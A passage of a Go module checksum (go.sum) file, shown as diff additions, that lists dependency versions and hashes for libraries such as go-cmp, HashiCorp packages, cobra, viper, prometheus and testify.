v0.0.0-20180813153112-4030bb1f1f0c/go.mod 
h1:lNA+9X1NB3Zf8V7Ke586lFgjr2dZNuvo3lPJSGZ5JPQ= +github.com/google/btree v1.0.0/go.mod h1:lNA+9X1NB3Zf8V7Ke586lFgjr2dZNuvo3lPJSGZ5JPQ= +github.com/google/go-cmp v0.2.0/go.mod h1:oXzfMopK8JAjlY9xF4vHSVASa0yLyX7SntLO5aqRK0M= +github.com/google/go-cmp v0.3.0/go.mod h1:8QqcDgzrUqlUb/G2PQTWiueGozuR1884gddMywk6iLU= +github.com/google/go-cmp v0.3.1/go.mod h1:8QqcDgzrUqlUb/G2PQTWiueGozuR1884gddMywk6iLU= +github.com/google/go-cmp v0.4.0/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= +github.com/google/go-cmp v0.4.1/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= +github.com/google/go-cmp v0.5.0/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= +github.com/google/go-cmp v0.5.1/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= +github.com/google/go-cmp v0.5.2/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= +github.com/google/go-cmp v0.5.3/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= +github.com/google/go-cmp v0.5.4/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= +github.com/google/go-cmp v0.5.5/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= +github.com/google/go-cmp v0.5.6/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= +github.com/google/gofuzz v1.0.0/go.mod h1:dBl0BpW6vV/+mYPU4Po3pmUjxk6FQPldtuIdl/M65Eg= +github.com/google/martian v2.1.0+incompatible/go.mod h1:9I4somxYTbIHy5NJKHRl3wXiIaQGbYVAs8BPL6v8lEs= +github.com/google/martian/v3 v3.0.0/go.mod h1:y5Zk1BBys9G+gd6Jrk0W3cC1+ELVxBWuIGO+w/tUAp0= +github.com/google/martian/v3 v3.1.0/go.mod h1:y5Zk1BBys9G+gd6Jrk0W3cC1+ELVxBWuIGO+w/tUAp0= +github.com/google/martian/v3 v3.2.1/go.mod h1:oBOf6HBosgwRXnUGWUB05QECsc6uvmMiJ3+6W4l/CUk= +github.com/google/pprof v0.0.0-20181206194817-3ea8567a2e57/go.mod h1:zfwlbNMJ+OItoe0UupaVj+oy1omPYYDuagoSzA8v9mc= +github.com/google/pprof v0.0.0-20190515194954-54271f7e092f/go.mod h1:zfwlbNMJ+OItoe0UupaVj+oy1omPYYDuagoSzA8v9mc= +github.com/google/pprof v0.0.0-20191218002539-d4f498aebedc/go.mod 
h1:ZgVRPoUq/hfqzAqh7sHMqb3I9Rq5C59dIz2SbBwJ4eM= +github.com/google/pprof v0.0.0-20200212024743-f11f1df84d12/go.mod h1:ZgVRPoUq/hfqzAqh7sHMqb3I9Rq5C59dIz2SbBwJ4eM= +github.com/google/pprof v0.0.0-20200229191704-1ebb73c60ed3/go.mod h1:ZgVRPoUq/hfqzAqh7sHMqb3I9Rq5C59dIz2SbBwJ4eM= +github.com/google/pprof v0.0.0-20200430221834-fc25d7d30c6d/go.mod h1:ZgVRPoUq/hfqzAqh7sHMqb3I9Rq5C59dIz2SbBwJ4eM= +github.com/google/pprof v0.0.0-20200708004538-1a94d8640e99/go.mod h1:ZgVRPoUq/hfqzAqh7sHMqb3I9Rq5C59dIz2SbBwJ4eM= +github.com/google/pprof v0.0.0-20201023163331-3e6fc7fc9c4c/go.mod h1:kpwsk12EmLew5upagYY7GY0pfYCcupk39gWOCRROcvE= +github.com/google/pprof v0.0.0-20201203190320-1bf35d6f28c2/go.mod h1:kpwsk12EmLew5upagYY7GY0pfYCcupk39gWOCRROcvE= +github.com/google/pprof v0.0.0-20210122040257-d980be63207e/go.mod h1:kpwsk12EmLew5upagYY7GY0pfYCcupk39gWOCRROcvE= +github.com/google/pprof v0.0.0-20210226084205-cbba55b83ad5/go.mod h1:kpwsk12EmLew5upagYY7GY0pfYCcupk39gWOCRROcvE= +github.com/google/pprof v0.0.0-20210601050228-01bbb1931b22/go.mod h1:kpwsk12EmLew5upagYY7GY0pfYCcupk39gWOCRROcvE= +github.com/google/pprof v0.0.0-20210609004039-a478d1d731e9/go.mod h1:kpwsk12EmLew5upagYY7GY0pfYCcupk39gWOCRROcvE= +github.com/google/pprof v0.0.0-20210720184732-4bb14d4b1be1/go.mod h1:kpwsk12EmLew5upagYY7GY0pfYCcupk39gWOCRROcvE= +github.com/google/renameio v0.1.0/go.mod h1:KWCgfxg9yswjAJkECMjeO8J8rahYeXnNhOm40UhjYkI= +github.com/google/uuid v1.1.2/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= +github.com/googleapis/gax-go/v2 v2.0.4/go.mod h1:0Wqv26UfaUD9n4G6kQubkQ+KchISgw+vpHVxEJEs9eg= +github.com/googleapis/gax-go/v2 v2.0.5/go.mod h1:DWXyrwAJ9X0FpwwEdw+IPEYBICEFu5mhpdKc/us6bOk= +github.com/googleapis/gax-go/v2 v2.1.0/go.mod h1:Q3nei7sK6ybPYH7twZdmQpAd1MKb7pfu6SK+H1/DsU0= +github.com/googleapis/gax-go/v2 v2.1.1/go.mod h1:hddJymUZASv3XPyGkUpKj8pPO47Rmb0eJc8R6ouapiM= +github.com/grpc-ecosystem/grpc-gateway v1.16.0/go.mod h1:BDjrQk3hbvj6Nolgz8mAMFbcEtjT1g+wF4CSlocrBnw= 
+github.com/hashicorp/consul/api v1.11.0/go.mod h1:XjsvQN+RJGWI2TWy1/kqaE16HrR2J/FWgkYjdZQsX9M= +github.com/hashicorp/consul/sdk v0.8.0/go.mod h1:GBvyrGALthsZObzUGsfgHZQDXjg4lOjagTIwIR1vPms= +github.com/hashicorp/errwrap v1.0.0/go.mod h1:YH+1FKiLXxHSkmPseP+kNlulaMuP3n2brvKWEqk/Jc4= +github.com/hashicorp/go-cleanhttp v0.5.0/go.mod h1:JpRdi6/HCYpAwUzNwuwqhbovhLtngrth3wmdIIUrZ80= +github.com/hashicorp/go-cleanhttp v0.5.1/go.mod h1:JpRdi6/HCYpAwUzNwuwqhbovhLtngrth3wmdIIUrZ80= +github.com/hashicorp/go-cleanhttp v0.5.2/go.mod h1:kO/YDlP8L1346E6Sodw+PrpBSV4/SoxCXGY6BqNFT48= +github.com/hashicorp/go-hclog v0.12.0/go.mod h1:whpDNt7SSdeAju8AWKIWsul05p54N/39EeqMAyrmvFQ= +github.com/hashicorp/go-hclog v1.0.0/go.mod h1:whpDNt7SSdeAju8AWKIWsul05p54N/39EeqMAyrmvFQ= +github.com/hashicorp/go-immutable-radix v1.0.0/go.mod h1:0y9vanUI8NX6FsYoO3zeMjhV/C5i9g4Q3DwcSNZ4P60= +github.com/hashicorp/go-immutable-radix v1.3.1/go.mod h1:0y9vanUI8NX6FsYoO3zeMjhV/C5i9g4Q3DwcSNZ4P60= +github.com/hashicorp/go-msgpack v0.5.3/go.mod h1:ahLV/dePpqEmjfWmKiqvPkv/twdG7iPBM1vqhUKIvfM= +github.com/hashicorp/go-multierror v1.0.0/go.mod h1:dHtQlpGsu+cZNNAkkCN/P3hoUDHhCYQXV3UM06sGGrk= +github.com/hashicorp/go-multierror v1.1.0/go.mod h1:spPvp8C1qA32ftKqdAHm4hHTbPw+vmowP0z+KUhOZdA= +github.com/hashicorp/go-retryablehttp v0.5.3/go.mod h1:9B5zBasrRhHXnJnui7y6sL7es7NDiJgTc6Er0maI1Xs= +github.com/hashicorp/go-rootcerts v1.0.2/go.mod h1:pqUvnprVnM5bf7AOirdbb01K4ccR319Vf4pU3K5EGc8= +github.com/hashicorp/go-sockaddr v1.0.0/go.mod h1:7Xibr9yA9JjQq1JpNB2Vw7kxv8xerXegt+ozgdvDeDU= +github.com/hashicorp/go-syslog v1.0.0/go.mod h1:qPfqrKkXGihmCqbJM2mZgkZGvKG1dFdvsLplgctolz4= +github.com/hashicorp/go-uuid v1.0.0/go.mod h1:6SBZvOh/SIDV7/2o3Jml5SYk/TvGqwFJ/bN7x4byOro= +github.com/hashicorp/go-uuid v1.0.1/go.mod h1:6SBZvOh/SIDV7/2o3Jml5SYk/TvGqwFJ/bN7x4byOro= +github.com/hashicorp/golang-lru v0.5.0/go.mod h1:/m3WP610KZHVQ1SGc6re/UDhFvYD7pJ4Ao+sR/qLZy8= +github.com/hashicorp/golang-lru v0.5.1/go.mod 
h1:/m3WP610KZHVQ1SGc6re/UDhFvYD7pJ4Ao+sR/qLZy8= +github.com/hashicorp/golang-lru v0.5.4/go.mod h1:iADmTwqILo4mZ8BN3D2Q6+9jd8WM5uGBxy+E8yxSoD4= +github.com/hashicorp/hcl v1.0.0 h1:0Anlzjpi4vEasTeNFn2mLJgTSwt0+6sfsiTG8qcWGx4= +github.com/hashicorp/hcl v1.0.0/go.mod h1:E5yfLk+7swimpb2L/Alb/PJmXilQ/rhwaUYs4T20WEQ= +github.com/hashicorp/logutils v1.0.0/go.mod h1:QIAnNjmIWmVIIkWDTG1z5v++HQmx9WQRO+LraFDTW64= +github.com/hashicorp/mdns v1.0.1/go.mod h1:4gW7WsVCke5TE7EPeYliwHlRUyBtfCwuFwuMg2DmyNY= +github.com/hashicorp/mdns v1.0.4/go.mod h1:mtBihi+LeNXGtG8L9dX59gAEa12BDtBQSp4v/YAJqrc= +github.com/hashicorp/memberlist v0.2.2/go.mod h1:MS2lj3INKhZjWNqd3N0m3J+Jxf3DAOnAH9VT3Sh9MUE= +github.com/hashicorp/memberlist v0.3.0/go.mod h1:MS2lj3INKhZjWNqd3N0m3J+Jxf3DAOnAH9VT3Sh9MUE= +github.com/hashicorp/serf v0.9.5/go.mod h1:UWDWwZeL5cuWDJdl0C6wrvrUwEqtQ4ZKBKKENpqIUyk= +github.com/hashicorp/serf v0.9.6/go.mod h1:TXZNMjZQijwlDvp+r0b63xZ45H7JmCmgg4gpTwn9UV4= +github.com/iancoleman/strcase v0.2.0/go.mod h1:iwCmte+B7n89clKwxIoIXy/HfoL7AsD47ZCWhYzw7ho= +github.com/ianlancetaylor/demangle v0.0.0-20181102032728-5e5cf60278f6/go.mod h1:aSSvb/t6k1mPoxDqO4vJh6VOCGPwU4O0C2/Eqndh1Sc= +github.com/ianlancetaylor/demangle v0.0.0-20200824232613-28f6c0f3b639/go.mod h1:aSSvb/t6k1mPoxDqO4vJh6VOCGPwU4O0C2/Eqndh1Sc= +github.com/inconshreveable/mousetrap v1.0.0 h1:Z8tu5sraLXCXIcARxBp/8cbvlwVa7Z1NHg9XEKhtSvM= +github.com/inconshreveable/mousetrap v1.0.0/go.mod h1:PxqpIevigyE2G7u3NXJIT2ANytuPF1OarO4DADm73n8= +github.com/inconshreveable/mousetrap v1.1.0 h1:wN+x4NVGpMsO7ErUn/mUI3vEoE6Jt13X2s0bqwp9tc8= +github.com/inconshreveable/mousetrap v1.1.0/go.mod h1:vpF70FUmC8bwa3OWnCshd2FqLfsEA9PFc4w1p2J65bw= +github.com/json-iterator/go v1.1.6/go.mod h1:+SdeFBvtyEkXs7REEP0seUULqWtbJapLOCVDaaPEHmU= +github.com/json-iterator/go v1.1.9/go.mod h1:KdQUCv79m/52Kvf8AW2vK1V8akMuk1QjK/uOdHXbAo4= +github.com/json-iterator/go v1.1.11/go.mod h1:KdQUCv79m/52Kvf8AW2vK1V8akMuk1QjK/uOdHXbAo4= +github.com/json-iterator/go v1.1.12/go.mod 
h1:e30LSqwooZae/UwlEbR2852Gd8hjQvJoHmT4TnhNGBo= +github.com/jstemmer/go-junit-report v0.0.0-20190106144839-af01ea7f8024/go.mod h1:6v2b51hI/fHJwM22ozAgKL4VKDeJcHhJFhtBdhmNjmU= +github.com/jstemmer/go-junit-report v0.9.1/go.mod h1:Brl9GWCQeLvo8nXZwPNNblvFj/XSXhF0NWZEnDohbsk= +github.com/judwhite/go-svc v1.2.1 h1:a7fsJzYUa33sfDJRF2N/WXhA+LonCEEY8BJb1tuS5tA= +github.com/judwhite/go-svc v1.2.1/go.mod h1:mo/P2JNX8C07ywpP9YtO2gnBgnUiFTHqtsZekJrUuTk= +github.com/julienschmidt/httprouter v1.2.0/go.mod h1:SYymIcj16QtmaHHD7aYtjjsJG7VTCxuUUipMqKk8s4w= +github.com/kisielk/errcheck v1.5.0/go.mod h1:pFxgyoBC7bSaBwPgfKdkLd5X25qrDl4LWUI2bnpBCr8= +github.com/kisielk/gotool v1.0.0/go.mod h1:XhKaO+MFFWcvkIS/tQcRk01m1F5IRFswLeQ+oQHNcck= +github.com/konsorten/go-windows-terminal-sequences v1.0.1/go.mod h1:T0+1ngSBFLxvqU3pZ+m/2kptfBszLMUkC4ZK/EgS/cQ= +github.com/kr/fs v0.1.0/go.mod h1:FFnZGqtBN9Gxj7eW1uZ42v5BccTP0vu6NEaFoC2HwRg= +github.com/kr/logfmt v0.0.0-20140226030751-b84e30acd515/go.mod h1:+0opPa2QZZtGFBFZlji/RkVcI2GknAs/DXo4wKdlNEc= +github.com/kr/pretty v0.1.0/go.mod h1:dAy3ld7l9f0ibDNOQOHHMYYIIbhfbHSm3C4ZsoJORNo= +github.com/kr/pretty v0.2.0 h1:s5hAObm+yFO5uHYt5dYjxi2rXrsnmRpJx4OYvIWUaQs= +github.com/kr/pretty v0.2.0/go.mod h1:ipq/a2n7PKx3OHsz4KJII5eveXtPO4qwEXGdVfWzfnI= +github.com/kr/pty v1.1.1/go.mod h1:pFQYn66WHrOpPYNljwOMqo10TkYh1fy3cYio2l3bCsQ= +github.com/kr/text v0.1.0 h1:45sCR5RtlFHMR4UwH9sdQ5TC8v0qDQCHnXt+kaKSTVE= +github.com/kr/text v0.1.0/go.mod h1:4Jbv+DJW3UT/LiOwJeYQe1efqtUx/iVham/4vfdArNI= +github.com/lyft/protoc-gen-star v0.5.3/go.mod h1:V0xaHgaf5oCCqmcxYcWiDfTiKsZsRc87/1qhoTACD8w= +github.com/magiconair/properties v1.8.5 h1:b6kJs+EmPFMYGkow9GiUyCyOvIwYetYJ3fSaWak/Gls= +github.com/magiconair/properties v1.8.5/go.mod h1:y3VJvCyxH9uVvJTWEGAELF3aiYNyPKd5NZ3oSwXrF60= +github.com/manifoldco/promptui v0.9.0 h1:3V4HzJk1TtXW1MTZMP7mdlwbBpIinw3HztaIlYthEiA= +github.com/manifoldco/promptui v0.9.0/go.mod h1:ka04sppxSGFAtxX0qhlYQjISsg9mR4GWtQEhdbn6Pgg= 
+github.com/mattn/go-colorable v0.0.9/go.mod h1:9vuHe8Xs5qXnSaW/c/ABM9alt+Vo+STaOChaDxuIBZU= +github.com/mattn/go-colorable v0.1.4/go.mod h1:U0ppj6V5qS13XJ6of8GYAs25YV2eR4EVcfRqFIhoBtE= +github.com/mattn/go-colorable v0.1.6/go.mod h1:u6P/XSegPjTcexA+o6vUJrdnUu04hMope9wVRipJSqc= +github.com/mattn/go-colorable v0.1.9/go.mod h1:u6P/XSegPjTcexA+o6vUJrdnUu04hMope9wVRipJSqc= +github.com/mattn/go-colorable v0.1.12/go.mod h1:u5H1YNBxpqRaxsYJYSkiCWKzEfiAb1Gb520KVy5xxl4= +github.com/mattn/go-isatty v0.0.3/go.mod h1:M+lRXTBqGeGNdLjl/ufCoiOlB5xdOkqRJdNxMWT7Zi4= +github.com/mattn/go-isatty v0.0.8/go.mod h1:Iq45c/XA43vh69/j3iqttzPXn0bhXyGjM0Hdxcsrc5s= +github.com/mattn/go-isatty v0.0.10/go.mod h1:qgIWMr58cqv1PHHyhnkY9lrL7etaEgOFcMEpPG5Rm84= +github.com/mattn/go-isatty v0.0.11/go.mod h1:PhnuNfih5lzO57/f3n+odYbM4JtupLOxQOAqxQCu2WE= +github.com/mattn/go-isatty v0.0.12/go.mod h1:cbi8OIDigv2wuxKPP5vlRcQ1OAZbq2CE4Kysco4FUpU= +github.com/mattn/go-isatty v0.0.14/go.mod h1:7GGIvUiUoEMVVmxf/4nioHXj79iQHKdU27kJ6hsGG94= +github.com/matttproud/golang_protobuf_extensions v1.0.1/go.mod h1:D8He9yQNgCq6Z5Ld7szi9bcBfOoFv/3dc6xSMkL2PC0= +github.com/miekg/dns v1.0.14/go.mod h1:W1PPwlIAgtquWBMBEV9nkV9Cazfe8ScdGz/Lj7v3Nrg= +github.com/miekg/dns v1.1.26/go.mod h1:bPDLeHnStXmXAq1m/Ch/hvfNHr14JKNPMBo3VZKjuso= +github.com/miekg/dns v1.1.41/go.mod h1:p6aan82bvRIyn+zDIv9xYNUpwa73JcSh9BKwknJysuI= +github.com/mitchellh/cli v1.1.0/go.mod h1:xcISNoH86gajksDmfB23e/pu+B+GeFRMYmoHXxx3xhI= +github.com/mitchellh/go-homedir v1.1.0/go.mod h1:SfyaCUpYCn1Vlf4IUYiD9fPX4A5wJrkLzIz1N1q0pr0= +github.com/mitchellh/go-testing-interface v1.0.0/go.mod h1:kRemZodwjscx+RGhAo8eIhFbs2+BFgRtFPeD/KE+zxI= +github.com/mitchellh/mapstructure v0.0.0-20160808181253-ca63d7c062ee/go.mod h1:FVVH3fgwuzCH5S8UJGiWEs2h04kUh9fWfEaFds41c1Y= +github.com/mitchellh/mapstructure v1.1.2/go.mod h1:FVVH3fgwuzCH5S8UJGiWEs2h04kUh9fWfEaFds41c1Y= +github.com/mitchellh/mapstructure v1.4.3 h1:OVowDSCllw/YjdLkam3/sm7wEtOy59d8ndGgCcyj8cs= 
+github.com/mitchellh/mapstructure v1.4.3/go.mod h1:bFUtVrKA4DC2yAKiSyO/QUcy7e+RRV2QTWOzhPopBRo= +github.com/modern-go/concurrent v0.0.0-20180228061459-e0a39a4cb421/go.mod h1:6dJC0mAP4ikYIbvyc7fijjWJddQyLn8Ig3JB5CqoB9Q= +github.com/modern-go/concurrent v0.0.0-20180306012644-bacd9c7ef1dd/go.mod h1:6dJC0mAP4ikYIbvyc7fijjWJddQyLn8Ig3JB5CqoB9Q= +github.com/modern-go/reflect2 v0.0.0-20180701023420-4b7aa43c6742/go.mod h1:bx2lNnkwVCuqBIxFjflWJWanXIb3RllmbCylyMrvgv0= +github.com/modern-go/reflect2 v1.0.1/go.mod h1:bx2lNnkwVCuqBIxFjflWJWanXIb3RllmbCylyMrvgv0= +github.com/modern-go/reflect2 v1.0.2/go.mod h1:yWuevngMOJpCy52FWWMvUC8ws7m/LJsjYzDa0/r8luk= +github.com/mwitkow/go-conntrack v0.0.0-20161129095857-cc309e4a2223/go.mod h1:qRWi+5nqEBWmkhHvq77mSJWrCKwh8bxhgT7d/eI7P4U= +github.com/pascaldekloe/goe v0.0.0-20180627143212-57f6aae5913c/go.mod h1:lzWF7FIEvWOWxwDKqyGYQf6ZUaNfKdP144TG7ZOy1lc= +github.com/pascaldekloe/goe v0.1.0/go.mod h1:lzWF7FIEvWOWxwDKqyGYQf6ZUaNfKdP144TG7ZOy1lc= +github.com/pelletier/go-toml v1.9.4 h1:tjENF6MfZAg8e4ZmZTeWaWiT2vXtsoO6+iuOjFhECwM= +github.com/pelletier/go-toml v1.9.4/go.mod h1:u1nR/EPcESfeI/szUZKdtJ0xRNbUoANCkoOuaOx1Y+c= +github.com/pkg/errors v0.8.0/go.mod h1:bwawxfHBFNV+L2hUp1rHADufV3IMtnDRdf1r5NINEl0= +github.com/pkg/errors v0.8.1/go.mod h1:bwawxfHBFNV+L2hUp1rHADufV3IMtnDRdf1r5NINEl0= +github.com/pkg/errors v0.9.1/go.mod h1:bwawxfHBFNV+L2hUp1rHADufV3IMtnDRdf1r5NINEl0= +github.com/pkg/sftp v1.10.1/go.mod h1:lYOWFsE0bwd1+KfKJaKeuokY15vzFx25BLbzYYoAxZI= +github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM= +github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4= +github.com/posener/complete v1.1.1/go.mod h1:em0nMJCgc9GFtwrmVmEMR/ZL6WyhyjMBndrE9hABlRI= +github.com/posener/complete v1.2.3/go.mod h1:WZIdtGGp+qx0sLrYKtIRAruyNpv6hFCicSgv7Sy7s/s= +github.com/prometheus/client_golang v0.9.1/go.mod h1:7SWBe2y4D6OKWSNQJUaRYU/AaXPKyh/dDVn+NZz0KFw= +github.com/prometheus/client_golang 
v1.0.0/go.mod h1:db9x61etRT2tGnBNRi70OPL5FsnadC4Ky3P0J6CfImo= +github.com/prometheus/client_golang v1.4.0/go.mod h1:e9GMxYsXl05ICDXkRhurwBS4Q3OK1iX/F2sw+iXX5zU= +github.com/prometheus/client_model v0.0.0-20180712105110-5c3871d89910/go.mod h1:MbSGuTsp3dbXC40dX6PRTWyKYBIrTGTE9sqQNg2J8bo= +github.com/prometheus/client_model v0.0.0-20190129233127-fd36f4220a90/go.mod h1:xMI15A0UPsDsEKsMN9yxemIoYk6Tm2C1GtYGdfGttqA= +github.com/prometheus/client_model v0.0.0-20190812154241-14fe0d1b01d4/go.mod h1:xMI15A0UPsDsEKsMN9yxemIoYk6Tm2C1GtYGdfGttqA= +github.com/prometheus/client_model v0.2.0/go.mod h1:xMI15A0UPsDsEKsMN9yxemIoYk6Tm2C1GtYGdfGttqA= +github.com/prometheus/common v0.4.1/go.mod h1:TNfzLD0ON7rHzMJeJkieUDPYmFC7Snx/y86RQel1bk4= +github.com/prometheus/common v0.9.1/go.mod h1:yhUN8i9wzaXS3w1O07YhxHEBxD+W35wd8bs7vj7HSQ4= +github.com/prometheus/procfs v0.0.0-20181005140218-185b4288413d/go.mod h1:c3At6R/oaqEKCNdg8wHV1ftS6bRYblBhIjjI8uT2IGk= +github.com/prometheus/procfs v0.0.2/go.mod h1:TjEm7ze935MbeOT/UhFTIMYKhuLP4wbCsTZCD3I8kEA= +github.com/prometheus/procfs v0.0.8/go.mod h1:7Qr8sr6344vo1JqZ6HhLceV9o3AJ1Ff+GxbHq6oeK9A= +github.com/rogpeppe/fastuuid v1.2.0/go.mod h1:jVj6XXZzXRy/MSR5jhDC/2q6DgLz+nrA6LYCDYWNEvQ= +github.com/rogpeppe/go-internal v1.3.0/go.mod h1:M8bDsm7K2OlrFYOpmOWEs/qY81heoFRclV5y23lUDJ4= +github.com/rs/xid v1.3.0/go.mod h1:trrq9SKmegXys3aeAKXMUTdJsYXVwGY3RLcfgqegfbg= +github.com/rs/zerolog v1.26.0 h1:ORM4ibhEZeTeQlCojCK2kPz1ogAY4bGs4tD+SaAdGaE= +github.com/rs/zerolog v1.26.0/go.mod h1:yBiM87lvSqX8h0Ww4sdzNSkVYZ8dL2xjZJG1lAuGZEo= +github.com/russross/blackfriday/v2 v2.1.0/go.mod h1:+Rmxgy9KzJVeS9/2gXHxylqXiyQDYRxCVz55jmeOWTM= +github.com/ryanuber/columnize v0.0.0-20160712163229-9b3edd62028f/go.mod h1:sm1tb6uqfes/u+d4ooFouqFdy9/2g9QGwK3SQygK0Ts= +github.com/sagikazarmark/crypt v0.3.0/go.mod h1:uD/D+6UF4SrIR1uGEv7bBNkNqLGqUr43MRiaGWX1Nig= +github.com/sean-/seed v0.0.0-20170313163322-e2103e2c3529/go.mod h1:DxrIzT+xaE7yg65j358z/aeFdxmN0P9QXhEzd20vsDc= 
+github.com/sirupsen/logrus v1.2.0/go.mod h1:LxeOpSwHxABJmUn/MG1IvRgCAasNZTLOkJPxbbu5VWo= +github.com/sirupsen/logrus v1.4.2/go.mod h1:tLMulIdttU9McNUspp0xgXVQah82FyeX6MwdIuYE2rE= +github.com/spaolacci/murmur3 v0.0.0-20180118202830-f09979ecbc72/go.mod h1:JwIasOWyU6f++ZhiEuf87xNszmSA2myDM2Kzu9HwQUA= +github.com/spf13/afero v1.3.3/go.mod h1:5KUK8ByomD5Ti5Artl0RtHeI5pTF7MIDuXL3yY520V4= +github.com/spf13/afero v1.6.0 h1:xoax2sJ2DT8S8xA2paPFjDCScCNeWsg75VG0DLRreiY= +github.com/spf13/afero v1.6.0/go.mod h1:Ai8FlHk4v/PARR026UzYexafAt9roJ7LcLMAmO6Z93I= +github.com/spf13/cast v1.4.1 h1:s0hze+J0196ZfEMTs80N7UlFt0BDuQ7Q+JDnHiMWKdA= +github.com/spf13/cast v1.4.1/go.mod h1:Qx5cxh0v+4UWYiBimWS+eyWzqEqokIECu5etghLkUJE= +github.com/spf13/cobra v1.3.0 h1:R7cSvGu+Vv+qX0gW5R/85dx2kmmJT5z5NM8ifdYjdn0= +github.com/spf13/cobra v1.3.0/go.mod h1:BrRVncBjOJa/eUcVVm9CE+oC6as8k+VYr4NY7WCi9V4= +github.com/spf13/cobra v1.8.1 h1:e5/vxKd/rZsfSJMUX1agtjeTDf+qv1/JdBF8gg5k9ZM= +github.com/spf13/cobra v1.8.1/go.mod h1:wHxEcudfqmLYa8iTfL+OuZPbBZkmvliBWKIezN3kD9Y= +github.com/spf13/jwalterweatherman v1.1.0 h1:ue6voC5bR5F8YxI5S67j9i582FU4Qvo2bmqnqMYADFk= +github.com/spf13/jwalterweatherman v1.1.0/go.mod h1:aNWZUN0dPAAO/Ljvb5BEdw96iTZ0EXowPYD95IqWIGo= +github.com/spf13/pflag v1.0.5 h1:iy+VFUOCP1a+8yFto/drg2CJ5u0yRoB7fZw3DKv/JXA= +github.com/spf13/pflag v1.0.5/go.mod h1:McXfInJRrz4CZXVZOBLb0bTZqETkiAhM9Iw0y3An2Bg= +github.com/spf13/viper v1.10.0/go.mod h1:SoyBPwAtKDzypXNDFKN5kzH7ppppbGZtls1UpIy5AsM= +github.com/spf13/viper v1.10.1 h1:nuJZuYpG7gTj/XqiUwg8bA0cp1+M2mC3J4g5luUYBKk= +github.com/spf13/viper v1.10.1/go.mod h1:IGlFPqhNAPKRxohIzWpI5QEy4kuI7tcl5WvR+8qy1rU= +github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME= +github.com/stretchr/objx v0.1.1/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME= +github.com/stretchr/testify v1.2.2/go.mod h1:a8OnRcib4nhh0OaRAV+Yts87kKdq0PP7pXfy6kDkUVs= +github.com/stretchr/testify v1.3.0/go.mod 
h1:M5WIy9Dh21IEIfnGCwXGc5bZfKNJtfHm1UVUgZn+9EI= +github.com/stretchr/testify v1.4.0/go.mod h1:j7eGeouHqKxXV5pUuKE4zz7dFj8WfuZ+81PSLYec5m4= +github.com/stretchr/testify v1.5.1/go.mod h1:5W2xD1RspED5o8YsWQXVCued0rvSQ+mT+I5cxcmMvtA= +github.com/stretchr/testify v1.6.1/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg= +github.com/stretchr/testify v1.7.0 h1:nwc3DEeHmmLAfoZucVR881uASk0Mfjw8xYJ99tb5CcY= +github.com/stretchr/testify v1.7.0/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg= +github.com/subosito/gotenv v1.2.0 h1:Slr1R9HxAlEKefgq5jn9U+DnETlIUa6HfgEzj0g5d7s= +github.com/subosito/gotenv v1.2.0/go.mod h1:N0PQaV/YGNqwC0u51sEeR/aUtSLEXKX9iv69rRypqCw= +github.com/tv42/httpunix v0.0.0-20150427012821-b75d8614f926/go.mod h1:9ESjWnEqriFuLhtthL60Sar/7RFoluCcXsuvEwTV5KM= +github.com/youmark/pkcs8 v0.0.0-20201027041543-1326539a0a0a h1:fZHgsYlfvtyqToslyjUt3VOPF4J7aK/3MPcK7xp3PDk= +github.com/youmark/pkcs8 v0.0.0-20201027041543-1326539a0a0a/go.mod h1:ul22v+Nro/R083muKhosV54bj5niojjWZvU8xrevuH4= +github.com/yuin/goldmark v1.1.25/go.mod h1:3hX8gzYuyVAZsxl0MRgGTJEmQBFcNTphYh9decYSb74= +github.com/yuin/goldmark v1.1.27/go.mod h1:3hX8gzYuyVAZsxl0MRgGTJEmQBFcNTphYh9decYSb74= +github.com/yuin/goldmark v1.1.32/go.mod h1:3hX8gzYuyVAZsxl0MRgGTJEmQBFcNTphYh9decYSb74= +github.com/yuin/goldmark v1.2.1/go.mod h1:3hX8gzYuyVAZsxl0MRgGTJEmQBFcNTphYh9decYSb74= +github.com/yuin/goldmark v1.3.5/go.mod h1:mwnBkeHKe2W/ZEtQ+71ViKU8L12m81fl3OWwC1Zlc8k= +github.com/yuin/goldmark v1.4.0/go.mod h1:mwnBkeHKe2W/ZEtQ+71ViKU8L12m81fl3OWwC1Zlc8k= +go.etcd.io/etcd/api/v3 v3.5.1/go.mod h1:cbVKeC6lCfl7j/8jBhAK6aIYO9XOjdptoxU/nLQcPvs= +go.etcd.io/etcd/client/pkg/v3 v3.5.1/go.mod h1:IJHfcCEKxYu1Os13ZdwCwIUTUVGYTSAM3YSwc9/Ac1g= +go.etcd.io/etcd/client/v2 v2.305.1/go.mod h1:pMEacxZW7o8pg4CrFE7pquyCJJzZvkvdD2RibOCCCGs= +go.opencensus.io v0.21.0/go.mod h1:mSImk1erAIZhrmZN+AvHh14ztQfjbGwt4TtuofqLduU= +go.opencensus.io v0.22.0/go.mod h1:+kGneAE2xo2IficOXnaByMWTGM9T73dGwxeWcUqIpI8= +go.opencensus.io 
